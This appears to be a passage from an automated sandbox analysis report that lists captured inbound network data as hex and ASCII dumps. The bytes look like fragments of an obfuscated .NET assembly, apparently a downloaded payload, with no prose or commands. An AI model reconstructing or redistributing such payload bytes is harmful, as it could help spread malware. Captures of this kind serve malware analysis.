2022-02-22 14:30:32 UTC 2 IN Data Raw: fe 0c 02 00 58 4a 54 fe 0c 04 00 fe 0c 0e 00 20 00 00 00 00 9c fe 0c 0e 00 20 01 00 00 00 58 fe 0e 0e 00 fe 0c 01 00 20 08 00 00 00 58 fe 0e 01 00 38 d3 fd ff ff fe 0c 08 00 fe 0c 0e 00 20 02 00 00 00 59 8f 04 00 00 01 e0 fe 0c 08 00 fe 0c 0e 00 20 02 00 00 00 59 8f 04 00 00 01 e0 4a fe 0c 08 00 fe 0c 0e 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a 61 54 fe 0c 04 00 fe 0c 0e 00 20 02 00 00 00 59 20 00 00 00 00 9c fe 0c 0e 00 20 01 00 00 00 59 fe 0e 0e 00 38 6c fd ff ff fe 0c 08 00 fe 0c 0e 00 20 01 00 00 00 59 8f 04 00 00 01 e0 4a 80 01 00 00 04 fe 0c 0e 00 20 01 00 00 00 59 fe 0e 0e 00 38 3f fd ff ff 20 01 00 00 00 fe 0e 0b 00 38 31 fd ff ff 00 2a 1a 28 01 00 00 0a 2a 2a fe 09 00 00 28 02 00 00 0a 2a 00 13 30 03 00 32 00 00 00 00 00 00 00 20 02 00 00 00 8d Data Ascii: XJT X X8 Y YJ YJaT Y Y8l YJ Y8? 81*(**(*02

2022-02-22 14:30:32 UTC 4 IN Data Raw: 00 00 38 a2 00 00 00 38 05 00 00 00 38 00 00 00 00 00 00 38 13 ff ff ff fe 0c 02 00 fe 0c 0c 00 fe 0c 01 00 fe 0c 00 00 fe 0c 0e 00 58 4a 9a a2 fe 0c 0b 00 fe 0c 0c 00 20 05 00 00 00 9c fe 0c 0c 00 20 01 00 00 00 58 fe 0e 0c 00 fe 0c 00 00 20 08 00 00 00 58 fe 0e 00 00 38 cc fe ff ff fe 0c 02 00 fe 0c 0c 00 20 01 00 00 00 59 9a 74 03 00 00 02 7e 04 00 00 04 fe 0c 00 00 fe 0c 0e 00 58 4a 97 29 06 00 00 11 fe 0c 0c 00 20 01 00 00 00 59 fe 0e 0c 00 fe 0c 00 00 20 08 00 00 00 58 fe 0e 00 00 38 82 fe ff ff fe 0c 00 00 28 01 00 00 0a 28 02 00 00 0a 25 7e 01 00 00 04 61 20 a1 00 00 00 59 20 01 00 00 00 fe 0e 05 00 5a 58 fe 0e 00 00 38 53 fe ff ff 00 2a 2a fe 09 00 00 28 08 00 00 0a 2a 00 00 00 13 30 00 00 06 00 00 00 00 00 00 00 28 0c 00 00 06 2a 00 00 13 30 03 Data Ascii: 8888XJ X X8 Yt~XJ) Y X8((%~a Y ZX8S**(*0(*0

2022-02-22 14:30:32 UTC 5 IN Data Raw: 07 00 fe 0c 04 00 20 01 00 00 00 59 9a 74 04 00 00 1b 80 08 00 00 04 fe 0c 04 00 20 01 00 00 00 59 fe 0e 04 00 38 51 fc ff ff 00 38 4b fc ff ff fe 0c 05 00 28 01 00 00 0a 28 02 00 00 0a 25 7e 01 00 00 04 61 20 a1 00 00 00 59 20 01 00 00 00 fe 0e 0b 00 5a 58 fe 0e 05 00 38 1c fc ff ff 00 2a 00 00 13 30 06 00 7a 03 00 00 0c 00 00 11 fe 0d 06 00 25 20 01 00 00 00 54 46 fe 0e 0a 00 fe 0c 0a 00 20 04 00 00 00 5a fe 0e 03 00 fe 0c 0a 00 20 08 00 00 00 5a fe 0e 0e 00 20 01 00 00 00 8d 01 00 00 01 fe 0e 02 00 20 01 00 00 00 8d 02 00 00 01 fe 0e 05 00 20 01 00 00 00 8d 03 00 00 01 fe 0e 07 00 20 01 00 00 00 8d 04 00 00 01 25 fe 0e 00 00 fe 0e 04 00 20 01 00 00 00 8d 02 00 00 01 fe 0e 08 00 7f 4d 00 00 04 fe 0e 09 00 fe 0c 09 00 fe 0e 0b 00 fe 0c 0b 00 fe 0e 0d 00 Data Ascii: Yt Y8Q8K((%~a Y ZX8*0z% TF Z Z % M

2022-02-22 14:30:32 UTC 6 IN Data Raw: 00 38 d5 00 00 00 38 7c 00 00 00 38 77 00 00 00 20 06 00 00 00 fe 0c 01 00 3f 3e 00 00 00 20 06 00 00 00 fe 0c 01 00 3d 05 00 00 00 38 60 01 00 00 20 05 00 00 00 fe 0c 01 00 3f 18 00 00 00 20 05 00 00 00 fe 0c 01 00 3d 05 00 00 00 38 27 01 00 00 38 30 00 00 00 38 2b 00 00 00 20 07 00 00 00 fe 0c 01 00 3f 18 00 00 00 20 07 00 00 00 fe 0c 01 00 3d 05 00 00 00 38 5b 01 00 00 38 05 00 00 00 38 00 00 00 00 00 00 38 a1 fe ff ff fe 0c 05 00 fe 0c 0c 00 7e 0b 00 00 04 fe 0c 0b 00 fe 0c 03 00 58 4a 97 29 09 00 00 11 a2 fe 0c 02 00 fe 0c 0c 00 20 05 00 00 00 9c fe 0c 0c 00 20 01 00 00 00 58 fe 0e 0c 00 fe 0c 0b 00 20 08 00 00 00 58 fe 0e 0b 00 38 54 fe ff ff fe 0c 02 00 fe 0c 0c 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 05 00 fe 0c 0c 00 20 01 00 00 00 59 fe 0c Data Ascii: 88|8w ?> =8` ? =8'808+ ? =8[888~XJ) X X8T Y Y


Direction Data


2022-02-22 14:30:32 UTC 8 IN Data Raw: 0b 00 38 57 fd ff ff fe 0c 0b 00 28 01 00 00 0a 28 02 00 00 0a 25 7e 01 00 00 04 61 20 a1 00 00 00 59 20 01 00 00 00 fe 0e 0f 00 5a 58 fe 0e 0b 00 38 28 fd ff ff 00 fe 0c 05 00 fe 0c 0c 00 20 01 00 00 00 59 9a 2a 00 00 13 30 06 00 7a 03 00 00 10 00 00 11 fe 0d 01 00 25 20 01 00 00 00 54 46 fe 0e 0f 00 fe 0c 0f 00 20 04 00 00 00 5a fe 0e 02 00 fe 0c 0f 00 20 08 00 00 00 5a fe 0e 06 00 20 01 00 00 00 8d 01 00 00 01 fe 0e 05 00 20 01 00 00 00 8d 02 00 00 01 fe 0e 04 00 20 01 00 00 00 8d 03 00 00 01 fe 0e 0e 00 20 01 00 00 00 8d 04 00 00 01 25 fe 0e 07 00 fe 0e 03 00 20 01 00 00 00 8d 02 00 00 01 fe 0e 09 00 7f 50 00 00 04 fe 0e 08 00 fe 0c 08 00 fe 0e 0b 00 fe 0c 0b 00 fe 0e 00 00 00 fe 0c 0a 00 20 01 00 00 00 3b ca 02 00 00 fe 0c 0b 00 fe 0e 00 00 fe 0c 0b Data Ascii: 8W((%~a Y ZX8( Y*0z% TF Z Z % P ;

2022-02-22 14:30:32 UTC 9 IN Data Raw: 00 00 00 00 20 02 00 00 00 8d 06 00 00 01 80 0d 00 00 04 7e 0d 00 00 04 20 00 00 00 00 fe 06 20 00 00 06 9b 7e 0d 00 00 04 20 01 00 00 00 fe 06 21 00 00 06 9b 2a 00 00 13 30 06 00 d9 04 00 00 12 00 00 11 fe 0d 0c 00 25 20 01 00 00 00 54 46 fe 0e 00 00 fe 0c 00 00 20 04 00 00 00 5a fe 0e 02 00 fe 0c 00 00 20 08 00 00 00 5a fe 0e 01 00 20 02 00 00 00 8d 01 00 00 01 fe 0e 03 00 20 02 00 00 00 8d 02 00 00 01 fe 0e 0b 00 20 02 00 00 00 8d 03 00 00 01 fe 0e 07 00 20 01 00 00 00 8d 12 00 00 01 25 fe 0e 05 00 fe 0e 0f 00 20 02 00 00 00 8d 04 00 00 01 25 fe 0e 0d 00 fe 0e 04 00 20 02 00 00 00 8d 02 00 00 01 fe 0e 08 00 fe 0c 08 00 20 00 00 00 00 fe 09 01 00 a2 fe 0c 08 00 20 01 00 00 00 fe 09 00 00 a2 7f 51 00 00 04 fe 0e 06 00 fe 0c 06 00 fe 0e 11 00 fe 0c 11 00 Data Ascii: ~ ~ !*0% TF Z Z % % Q

2022-02-22 14:30:32 UTC 10 IN Data Raw: 01 00 00 00 8d 01 00 00 01 fe 0e 03 00 20 01 00 00 00 8d 02 00 00 01 fe 0e 0b 00 20 01 00 00 00 8d 03 00 00 01 fe 0e 07 00 20 01 00 00 00 8d 03 00 00 01 25 fe 0e 05 00 fe 0e 0f 00 20 01 00 00 00 8d 04 00 00 01 25 fe 0e 0d 00 fe 0e 04 00 20 01 00 00 00 8d 02 00 00 01 fe 0e 08 00 fe 0c 08 00 20 00 00 00 00 fe 09 00 00 a2 7f 52 00 00 04 fe 0e 06 00 fe 0c 06 00 fe 0e 11 00 fe 0c 11 00 fe 0e 10 00 00 fe 0c 0a 00 20 01 00 00 00 3b ea 02 00 00 fe 0c 11 00 fe 0e 10 00 fe 0c 11 00 46 fe 0e 0e 00 fe 0c 11 00 20 01 00 00 00 58 fe 0e 11 00 fe 0c 0e 00 20 01 00 00 00 3f 1d 01 00 00 fe 0c 0e 00 20 07 00 00 00 3d 0f 01 00 00 20 04 00 00 00 fe 0c 0e 00 3f 8a 00 00 00 20 04 00 00 00 fe 0c 0e 00 3d 05 00 00 00 38 a1 01 00 00 20 02 00 00 00 fe 0c 0e 00 3f 3e 00 00 00 20 02 Data Ascii: % % R ;F X ? = ? =8 ?>

2022-02-22 14:30:32 UTC 12 IN Data Raw: 00 00 00 38 2b 00 00 00 20 07 00 00 00 fe 0c 00 00 3f 18 00 00 00 20 07 00 00 00 fe 0c 00 00 3d 05 00 00 00 38 42 01 00 00 38 05 00 00 00 38 00 00 00 00 00 00 38 a1 fe ff ff fe 0c 05 00 fe 0c 09 00 d0 05 00 00 02 8c 13 00 00 01 a2 fe 0c 0d 00 fe 0c 09 00 20 04 00 00 00 9c fe 0c 09 00 20 01 00 00 00 58 fe 0e 09 00 38 6d fe ff ff fe 0c 0d 00 fe 0c 09 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 05 00 fe 0c 09 00 20 01 00 00 00 59 fe 0c 05 00 fe 0c 09 00 20 01 00 00 00 59 9a a5 13 00 00 01 7e 10 00 00 04 fe 0c 0c 00 fe 0c 02 00 58 4a 97 29 18 00 00 11 a2 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 38 0e fe ff ff fe 0c 08 00 fe 0c 0c 00 fe 0c 02 00 58 4a fe 0c 05 00 fe 0c 09 00 20 01 00 00 00 59 9a a2 fe 0c 0c 00 20 08 00 00 00 58 fe 0e 0c 00 fe 0c 09 00 20 01 Data Ascii: 8+ ? =8B888 X8m Y Y Y~XJ) X8XJ Y X

2022-02-22 14:30:32 UTC 13 IN Data Raw: 01 00 fe 0c 01 00 39 13 00 00 00 28 01 00 00 2b fe 0e 00 00 38 14 00 00 00 38 0e 00 00 00 00 fe 09 00 00 fe 0e 00 00 38 01 00 00 00 00 fe 0c 00 00 2a 00 00 00 13 30 02 00 1a 00 00 00 1c 00 00 11 00 fe 09 01 00 fe 0d 00 00 fe 15 05 00 00 1b fe 0c 00 00 81 05 00 00 1b 00 2a 00 00 13 30 05 00 4e 02 00 00 1d 00 00 11 fe 0d 0f 00 25 20 01 00 00 00 54 46 fe 0e 03 00 fe 0c 03 00 20 04 00 00 00 5a fe 0e 0b 00 fe 0c 03 00 20 08 00 00 00 5a fe 0e 05 00 20 01 00 00 00 8d 01 00 00 01 fe 0e 07 00 20 01 00 00 00 8d 02 00 00 01 fe 0e 01 00 20 01 00 00 00 8d 03 00 00 01 fe 0e 0d 00 20 01 00 00 00 8d 04 00 00 01 25 fe 0e 06 00 fe 0e 0e 00 20 01 00 00 00 8d 02 00 00 01 fe 0e 02 00 fe 0c 02 00 20 00 00 00 00 fe 09 00 00 a2 7f 55 00 00 04 fe 0e 09 00 fe 0c 09 00 fe 0e 04 00 Data Ascii: 9(+888*0*0N% TF Z Z % U

2022-02-22 14:30:32 UTC 14 IN Data Raw: 00 fe 0c 0b 00 fe 0e 01 00 fe 0c 0b 00 46 fe 0e 09 00 fe 0c 0b 00 20 01 00 00 00 58 fe 0e 0b 00 fe 0c 09 00 20 01 00 00 00 3f ab 00 00 00 fe 0c 09 00 20 04 00 00 00 3d 9d 00 00 00 20 02 00 00 00 fe 0c 09 00 3f 3e 00 00 00 20 02 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 83 00 00 00 20 01 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 01 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 5c 00 00 00 38 56 00 00 00 38 51 00 00 00 20 03 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 03 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 7e 00 00 00 38 2b 00 00 00 20 04 00 00 00 fe 0c 09 00 3f 18 00 00 00 20 04 00 00 00 fe 0c 09 00 3d 05 00 00 00 38 a2 00 00 00 38 05 00 00 00 38 00 00 00 00 00 00 38 13 ff ff ff fe 0c 06 00 fe 0c 0c 00 fe 0c 0e 00 fe 0c 0b 00 fe 0c 00 00 58 4a 9a a2 fe 0c 08 00 fe 0c 0c Data Ascii: F X ? = ?> =8 ? =8\8V8Q ? =8~8+ ? =8888XJ

2022-02-22 14:30:32 UTC 16 IN Data Raw: 00 3f 18 00 00 00 20 10 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 51 0d 00 00 38 65 01 00 00 38 60 01 00 00 20 13 00 00 00 fe 0c 27 00 3f 3e 00 00 00 20 13 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 23 0e 00 00 20 12 00 00 00 fe 0c 27 00 3f 18 00 00 00 20 12 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 a1 0d 00 00 38 19 01 00 00 38 14 01 00 00 20 14 00 00 00 fe 0c 27 00 3f 18 00 00 00 20 14 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 1f 0e 00 00 38 ee 00 00 00 38 e9 00 00 00 20 18 00 00 00 fe 0c 27 00 3f 64 00 00 00 20 18 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 df 16 00 00 20 16 00 00 00 fe 0c 27 00 3f 18 00 00 00 20 16 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 a0 0e 00 00 38 a2 00 00 00 20 17 00 00 00 fe 0c 27 00 3f 18 00 00 00 20 17 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 c4 Data Ascii: ? '=8Q8e8` '?> '=8# '? '=888 '? '=888 '?d '=8 '? '=88 '? '=8

2022-02-22 14:30:32 UTC 17 IN Data Raw: 0c 0a 00 fe 0c 04 00 fe 0c 21 00 fe 0c 18 00 58 4a 9a a2 fe 0c 15 00 fe 0c 0a 00 20 05 00 00 00 9c fe 0c 0a 00 20 01 00 00 00 58 fe 0e 0a 00 fe 0c 21 00 20 08 00 00 00 58 fe 0e 21 00 dd 98 f7 ff ff fe 0c 15 00 fe 0c 0a 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 10 00 fe 0c 0a 00 20 01 00 00 00 59 fe 0c 10 00 fe 0c 0a 00 20 01 00 00 00 59 9a 74 09 00 00 1b 7e 15 00 00 04 fe 0c 21 00 fe 0c 18 00 58 4a 97 29 22 00 00 11 a2 fe 0c 21 00 20 08 00 00 00 58 fe 0e 21 00 dd 39 f7 ff ff fe 0c 04 00 fe 0c 21 00 fe 0c 18 00 58 4a fe 0c 10 00 fe 0c 0a 00 20 01 00 00 00 59 9a a2 fe 0c 21 00 20 08 00 00 00 58 fe 0e 21 00 fe 0c 0a 00 20 01 00 00 00 59 fe 0e 0a 00 dd fa f6 ff ff fe 0c 19 00 fe 0c 21 00 fe 0c 18 00 58 4a 58 fe 0e 21 00 dd e2 f6 ff ff fe 0c 15 00 fe 0c 0a Data Ascii: !XJ X! X! Y Y Yt~!XJ)"! X!9!XJ Y! X! Y!XJX!

2022-02-22 14:30:32 UTC 18 IN Data Raw: fe 0c 13 00 58 20 02 00 00 00 5b fe 0e 0d 00 fe 0c 19 00 20 58 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 fe 0c 18 00 58 4a fe 0e 24 00 fe 0c 19 00 20 58 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 20 08 00 00 00 58 fe 0c 18 00 58 4a fe 0e 1f 00 fe 0c 26 00 fe 0c 24 00 fe 0c 1f 00 58 3c 16 00 00 00 fe 0c 24 00 fe 0c 26 00 3d 1c 00 00 00 fe 0c 0d 00 38 26 00 00 00 fe 0c 0d 00 20 01 00 00 00 58 fe 0e 23 00 38 6e ff ff ff fe 0c 0d 00 20 01 00 00 00 59 fe 0e 13 00 38 5b ff ff ff 00 fe 0e 25 00 fe 0c 19 00 20 58 01 00 00 58 fe 0c 25 00 20 18 00 00 00 5a 58 20 10 00 00 00 58 fe 0c 18 00 58 4a fe 0e 0e 00 fe 0c 0e 00 fe 0c 1d 00 3b bd 00 00 00 fe 0c 19 00 fe 0c 1d 00 58 20 10 00 00 00 58 fe 0c 18 00 58 4a fe 0e 0e 00 fe 0c 0e 00 20 ff ff ff ff 3b 78 00 00 00 Data Ascii: X [ XX ZXXJ$ XX ZX XXJ&$X<$&=8& X#8n Y8[% XX% ZX XXJ;X XXJ ;x

2022-02-22 14:30:32 UTC 20 IN Data Raw: 01 00 00 00 59 94 20 01 00 00 00 40 30 00 00 00 20 01 00 00 00 fe 0e 0a 00 fe 0c 15 00 fe 0c 0a 00 20 00 00 00 00 9c fe 0c 12 00 fe 0c 0a 00 8f 04 00 00 01 e0 20 00 00 00 00 54 dd 39 f1 ff ff 00 fe 0c 11 00 fe 0c 19 00 59 fe 0e 0b 00 20 00 00 00 00 fe 0e 1f 00 20 02 00 00 00 fe 0e 24 00 fe 0c 1f 00 fe 0c 24 00 58 20 02 00 00 00 5b fe 0e 0d 00 fe 0c 19 00 20 58 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 fe 0c 18 00 58 4a fe 0e 13 00 fe 0c 19 00 20 58 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 20 08 00 00 00 58 fe 0c 18 00 58 4a fe 0e 23 00 fe 0c 0b 00 fe 0c 13 00 fe 0c 23 00 58 3c 16 00 00 00 fe 0c 13 00 fe 0c 0b 00 3d 1c 00 00 00 fe 0c 0d 00 38 26 00 00 00 fe 0c 0d 00 20 01 00 00 00 58 fe 0e 1f 00 38 6e ff ff ff fe 0c 0d 00 20 01 00 00 00 59 fe 0e 24 Data Ascii: Y @0 T9Y $$X [ XX ZXXJ XX ZX XXJ##X<=8& X8n Y$


Direction Data


2022-02-22 14:30:32 UTC 21 IN Data Raw: 13 00 38 5b ff ff ff 00 fe 0e 26 00 fe 0c 19 00 20 a0 01 00 00 58 fe 0c 26 00 20 18 00 00 00 5a 58 20 10 00 00 00 58 fe 0c 18 00 58 4a fe 0e 16 00 fe 0c 16 00 fe 0c 17 00 fe 0c 14 00 94 40 e8 fe ff ff fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 00 fe 0c 1d 00 fe 0e 05 00 00 fe 0c 05 00 20 ff ff ff ff 3b b4 01 00 00 00 fe 0c 0e 00 fe 0e 0b 00 20 00 00 00 00 fe 0e 1f 00 20 02 00 00 00 fe 0e 24 00 fe 0c 1f 00 fe 0c 24 00 58 20 02 00 00 00 5b fe 0e 0d 00 fe 0c 19 00 20 58 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 fe 0c 18 00 58 4a fe 0e 13 00 fe 0c 19 00 20 58 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 20 08 00 00 00 58 fe 0c 18 00 58 4a fe 0e 23 00 fe 0c 0b 00 fe 0c 13 00 fe 0c 23 00 58 3c 16 00 00 00 fe 0c 13 00 fe 0c 0b 00 3d 1c 00 00 00 fe 0c 0d 00 38 Data Ascii: 8[& X& ZX XXJ@ X ; $$X [ XX ZXXJ XX ZX XXJ##X<=8

2022-02-22 14:30:32 UTC 22 IN Data Raw: 00 fe 0c 0e 00 20 01 00 00 00 3b b0 00 00 00 fe 0c 0e 00 20 02 00 00 00 3b 45 01 00 00 fe 0c 19 00 fe 0c 16 00 58 20 18 00 00 00 58 fe 0c 18 00 58 4a fe 0e 1f 00 20 01 00 00 00 fe 0e 0a 00 fe 0c 15 00 fe 0c 0a 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 10 00 fe 0c 0a 00 20 01 00 00 00 59 fe 0c 1b 00 a2 fe 0c 19 00 fe 0c 19 00 fe 0c 16 00 58 20 18 00 00 00 58 fe 0c 18 00 58 4a 58 fe 0e 21 00 fe 0c 22 00 fe 0c 14 00 fe 0c 1b 00 a2 fe 0c 17 00 fe 0c 14 00 fe 0c 16 00 9e fe 0c 06 00 fe 0c 14 00 20 02 00 00 00 9e fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 38 2e 01 00 00 00 fe 0c 19 00 fe 0c 16 00 58 20 20 00 00 00 58 fe 0c 18 00 58 4a fe 0e 1f 00 20 01 00 00 00 fe 0e 0a 00 fe 0c 15 00 fe 0c 0a 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 10 00 fe 0c 0a 00 20 Data Ascii: ; ;EX XXJ Y YX XXJX!" X8.X XXJ Y

2022-02-22 14:30:32 UTC 24 IN Data Raw: 0c 27 00 3f d6 00 00 00 20 13 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 97 0e 00 00 20 10 00 00 00 fe 0c 27 00 3f 64 00 00 00 20 10 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 a6 09 00 00 20 0e 00 00 00 fe 0c 27 00 3f 18 00 00 00 20 0e 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 b8 08 00 00 38 65 01 00 00 20 0f 00 00 00 fe 0c 27 00 3f 18 00 00 00 20 0f 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 ee 08 00 00 38 3f 01 00 00 38 3a 01 00 00 20 11 00 00 00 fe 0c 27 00 3f 18 00 00 00 20 11 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 78 0d 00 00 38 14 01 00 00 20 12 00 00 00 fe 0c 27 00 3f 18 00 00 00 20 12 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 7d 0d 00 00 38 ee 00 00 00 38 e9 00 00 00 20 16 00 00 00 fe 0c 27 00 3f 64 00 00 00 20 16 00 00 00 fe 0c 27 00 3d 05 00 00 00 38 c8 0e 00 00 Data Ascii: '? '=8 '?d '=8 '? '=88e '? '=88?8: '? '=8x8 '? '=8}88 '?d '=8

2022-02-22 14:30:32 UTC 25 IN Data Raw: 00 9e fe 0c 06 00 fe 0c 14 00 20 00 00 00 00 9e fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 38 0f 00 00 00 00 20 01 00 00 00 fe 0e 0f 00 fe 0c 20 00 7a 00 00 dd 31 f8 ff ff 00 dd 2b f8 ff ff fe 0c 10 00 fe 0c 0a 00 fe 0c 04 00 fe 0c 21 00 fe 0c 18 00 58 4a 9a a2 fe 0c 15 00 fe 0c 0a 00 20 05 00 00 00 9c fe 0c 0a 00 20 01 00 00 00 58 fe 0e 0a 00 fe 0c 21 00 20 08 00 00 00 58 fe 0e 21 00 dd e4 f7 ff ff fe 0c 15 00 fe 0c 0a 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 10 00 fe 0c 0a 00 20 01 00 00 00 59 fe 0c 10 00 fe 0c 0a 00 20 01 00 00 00 59 9a 74 09 00 00 1b 7e 16 00 00 04 fe 0c 21 00 fe 0c 18 00 58 4a 97 29 22 00 00 11 a2 fe 0c 21 00 20 08 00 00 00 58 fe 0e 21 00 dd 85 f7 ff ff fe 0c 04 00 fe 0c 21 00 fe 0c 18 00 58 4a fe 0c 10 00 fe 0c 0a 00 20 01 00 00 Data Ascii: X8 z1+!XJ X! X! Y Y Yt~!XJ)"! X!!XJ

2022-02-22 14:30:32 UTC 26 IN Data Raw: 00 20 01 00 00 00 59 fe 0e 24 00 38 5b ff ff ff 00 fe 0e 1d 00 fe 0c 19 00 20 3f 01 00 00 58 fe 0c 1d 00 20 18 00 00 00 5a 58 20 10 00 00 00 58 fe 0c 18 00 58 4a fe 0e 16 00 fe 0c 16 00 fe 0e 05 00 20 ff ff ff ff fe 0c 07 00 3b 1e 03 00 00 fe 0c 11 00 fe 0c 07 00 3b ff 02 00 00 fe 0c 07 00 fe 0c 19 00 59 fe 0e 16 00 00 fe 0c 14 00 20 00 00 00 00 3b 17 01 00 00 fe 0c 14 00 20 01 00 00 00 59 fe 0e 14 00 fe 0c 16 00 fe 0e 0b 00 20 00 00 00 00 fe 0e 1f 00 20 02 00 00 00 fe 0e 24 00 fe 0c 1f 00 fe 0c 24 00 58 20 02 00 00 00 5b fe 0e 0d 00 fe 0c 19 00 20 87 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 fe 0c 18 00 58 4a fe 0e 13 00 fe 0c 19 00 20 87 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 20 08 00 00 00 58 fe 0c 18 00 58 4a fe 0e 23 00 fe 0c 0b 00 fe 0c 13 Data Ascii: Y$8[ ?X ZX XXJ ;;Y ; Y $$X [ X ZXXJ X ZX XXJ#

2022-02-22 14:30:32 UTC 28 IN Data Raw: 00 dd b2 ed ff ff 20 00 00 00 00 fe 0e 0a 00 fe 0c 14 00 20 01 00 00 00 59 fe 0e 14 00 fe 0c 22 00 fe 0c 14 00 9a fe 0e 20 00 fe 0c 20 00 14 3b 4f 04 00 00 fe 0c 14 00 20 00 00 00 00 3b 49 00 00 00 fe 0c 06 00 fe 0c 14 00 20 01 00 00 00 59 94 20 01 00 00 00 40 30 00 00 00 20 01 00 00 00 fe 0e 0a 00 fe 0c 15 00 fe 0c 0a 00 20 00 00 00 00 9c fe 0c 12 00 fe 0c 0a 00 8f 04 00 00 01 e0 20 00 00 00 00 54 dd 32 f1 ff ff 00 fe 0c 11 00 fe 0c 19 00 59 fe 0e 0b 00 20 00 00 00 00 fe 0e 1f 00 20 02 00 00 00 fe 0e 24 00 fe 0c 1f 00 fe 0c 24 00 58 20 02 00 00 00 5b fe 0e 0d 00 fe 0c 19 00 20 3f 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 fe 0c 18 00 58 4a fe 0e 13 00 fe 0c 19 00 20 3f 01 00 00 58 fe 0c 0d 00 20 18 00 00 00 5a 58 20 08 00 00 00 58 fe 0c 18 00 58 4a fe Data Ascii: Y" ;O ;I Y @0 T2Y $$X [ ?X ZXXJ ?X ZX XXJ

2022-02-22 14:30:32 UTC 29 IN Data Raw: fe 0e 1f 00 fe 0c 25 00 fe 0c 24 00 fe 0c 1f 00 58 3c 16 00 00 00 fe 0c 24 00 fe 0c 25 00 3d 1c 00 00 00 fe 0c 0d 00 38 26 00 00 00 fe 0c 0d 00 20 01 00 00 00 58 fe 0e 23 00 38 6e ff ff ff fe 0c 0d 00 20 01 00 00 00 59 fe 0e 13 00 38 5b ff ff ff 00 fe 0e 26 00 fe 0c 19 00 20 87 01 00 00 58 fe 0c 26 00 20 18 00 00 00 5a 58 20 10 00 00 00 58 fe 0c 18 00 58 4a fe 0e 16 00 fe 0c 16 00 fe 0c 17 00 fe 0c 14 00 94 40 e8 fe ff ff fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 00 fe 0c 1d 00 fe 0e 05 00 00 fe 0c 05 00 20 ff ff ff ff 3b b4 01 00 00 00 fe 0c 0e 00 fe 0e 0b 00 20 00 00 00 00 fe 0e 1f 00 20 02 00 00 00 fe 0e 24 00 fe 0c 1f 00 fe 0c 24 00 58 20 02 00 00 00 5b fe 0e 0d 00 fe 0c 19 00 20 3f 01 00 00 58 fe 0c 0d 00 20 18 00 00 005a 58 fe 0c 18 00 58 4a fe 0e Data Ascii: %$X<$%=8& X#8n Y8[& X& ZX XXJ@ X ; $$X [ ?X ZXXJ

2022-02-22 14:30:32 UTC 30 IN Data Raw: fe 0e 0a 00 fe 0c 15 00 fe 0c 0a 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 10 00 fe 0c 0a 00 20 01 00 00 00 59 fe 0c 1b 00 a2 fe 0c 19 00 fe 0c 19 00 fe 0c 16 00 58 20 18 00 00 00 58 fe 0c 18 00 58 4a 58 fe 0e 21 00 fe 0c 22 00 fe 0c 14 00 fe 0c 1b 00 a2 fe 0c 17 00 fe 0c 14 00 fe 0c 16 00 9e fe 0c 06 00 fe 0c 14 00 20 02 00 00 00 9e fe 0c 14 00 20 01 00 00 00 58 fe 0e 14 00 38 2e 01 00 00 00 fe 0c 19 00 fe 0c 16 00 58 20 20 00 00 00 58 fe 0c 18 00 58 4a fe 0e 1f 00 20 01 00 00 00 fe 0e 0a 00 fe 0c 15 00 fe 0c 0a 00 20 01 00 00 00 59 20 05 00 00 00 9c fe 0c 10 00 fe 0c 0a 00 20 01 00 00 00 59 fe 0c 1b 00 a2 fe 0c 19 00 fe 0c 19 00 fe 0c 16 00 58 20 20 00 00 00 58 fe 0c 18 00 58 4a 58 fe 0e 21 00 fe 0c 22 00 fe 0c 14 00 fe 0c 1b 00 a2 fe 0c 17 00 fe 0c Data Ascii: Y YX XXJX!" X8.X XXJ Y YX XXJX!"

